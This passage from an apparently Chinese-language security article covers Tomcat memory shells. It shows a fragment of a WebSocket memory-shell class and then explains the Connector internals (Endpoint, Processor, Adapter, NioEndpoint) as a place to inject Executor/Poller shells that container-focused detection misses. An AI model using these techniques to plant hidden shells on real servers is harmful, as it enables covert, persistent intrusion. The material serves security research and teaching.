style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span>e</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">printStackTrace</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'AttributeTok';color: #7D9029;font-family: Consolas;">@Override</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">void</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">onOpen</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">Session session</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> EndpointConfig config</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">this</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">session</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> session</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">this</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">session</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">addMessageHandler</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">this</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:websocket内存马;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="font-family:Calibri;">Executor内存马->Poller内存马</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="font-family:Cambria;">之前看fd回显修改socket文件的时候就在想能不能控制我们的socket或者fd文件，这样就解决了负载均衡的问题，这个问题在深蓝师傅将内存马注入位置从container迁移到前置的connector时就得到了解决</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="font-family:Cambria;">Tomcat分为两个大组件，一个连接器和一个容器，tomcat内存马检测就是检测容器内的内存马，无法检测连接器位置的内存马</span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:宋体;">连接器 Connector</span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">连接器进一步细化：</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">监听网络端口；</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">接受网络请求；</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">读取网络字节流；</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">根据应用层协议解析字节流，生成统一的 tomcat request 和 tomcat response 对象；</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">将 tomcat request 对象转成 servletRequest；</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">调用 servlet 容器，得到 servletResponse；</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">将 servletResponse 转成 tomcat response；</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">将 tomcat response 转成网络字节流；</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;">将响应字节流写回给浏览器；</span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;"></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="font-family:Cambria;"></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="font-family:Calibri;">ProtocolHandler</span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:endpoint;"><span style="font-family:Calibri;">Endpoint</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:endpoint;"><span style="font-family:Cambria;">接口，抽象实现类是 AbstractEndpoint，具体子类在 NioEndpoint 和 Nio2Endpoint，其中两个重要组件：Acceptor 和 SocketProcessor。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:endpoint;"><span style="font-family:Cambria;">Acceptor 用于监听 Socket 连接请求，SocketProcessor 用于处理收到的 Socket 请求，提交到线程池 Executor 处理。</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:processor;"><span style="font-family:Calibri;">Processor</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:processor;"><span style="font-family:Cambria;">接收 Endpoint 的 socket，读取字节流解析成 tomcat request 和 response，通过 adapter 将其提交到容器处理。Processor 的具体实现类 AjpProcessor、Http11Processor 实现了特定协议的解析方法和请求处理方式。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:processor;"><span style="font-family:Cambria;">Endpoint 接收到 socket 连接后，生成一个 socketProcessor 交给线程池处理，run 方法会调用 Processor 解析应用层协议，生成 tomcat request 后，调用 adapter 的 service 方法。</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Calibri;">Adapter</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Cambria;">ProtocolHandler 接口负责解析请求生成 tomcat requst，CoyoteAdapter 的 service 方法，将 Tomcat Request 对象，转成 ServletRequest，再调用 service 方法</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Cambria;"></span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Cambria;">ProtocolHandler和Adapter，前者用于处理请求，而后者则是Connector与Container容器之间的一个连接器。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Cambria;">protocolHandler是Connector的一个主要属性，是Coyote用来处理协议的主要接口</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Cambria;">Coyote默认支持HTTP/1.1、HTTP/2、AJP协议，AJP协议是面向包的协议，因为虽然Tomcat可以作为独立的java web容器，但是它对静态资源的处理速度远不如其他专业的HTTP服务器比如Nginx，所以通常在实际应用中需要与其他HTTP服务器集成，而这个集成由AJP完成，默认监听8009端口。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Cambria;">另外Coyote默认支持NIO、NIO2（AIO）、APR三种I/O处理方式</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:adapter;"><span style="font-family:Cambria;">APR表示Apache可移植运行库，是Aapche Http服务器的支持库，开启这个模式Tomcat将以JNI的形式调用Apache HTTP服务器的核心链接库来处理文件或网络传输操作，从操作系统级别解决异步IO问题，大幅度的提高服务器的处理和响应性能，是Tomcat运行高并发应用的首选。</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Calibri;">NioEndpoint</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">这个NioEndpoint作为Tomcat NIO的IO处理策略，主要提供工作线程和线程池：</span></span></span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">Socket接收者Acceptor</span></span></span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">Socket轮询者Poller</span></span></span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">工作线程池</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://www.jianshu.com/p/a03357de3f38" target="_blank">https://www.jianshu.com/p/a03357de3f38</a></span></span></span></span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">class</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> NioEndpoint </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">extends</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> AbstractJsseEndpoint</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">NioChannel</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span 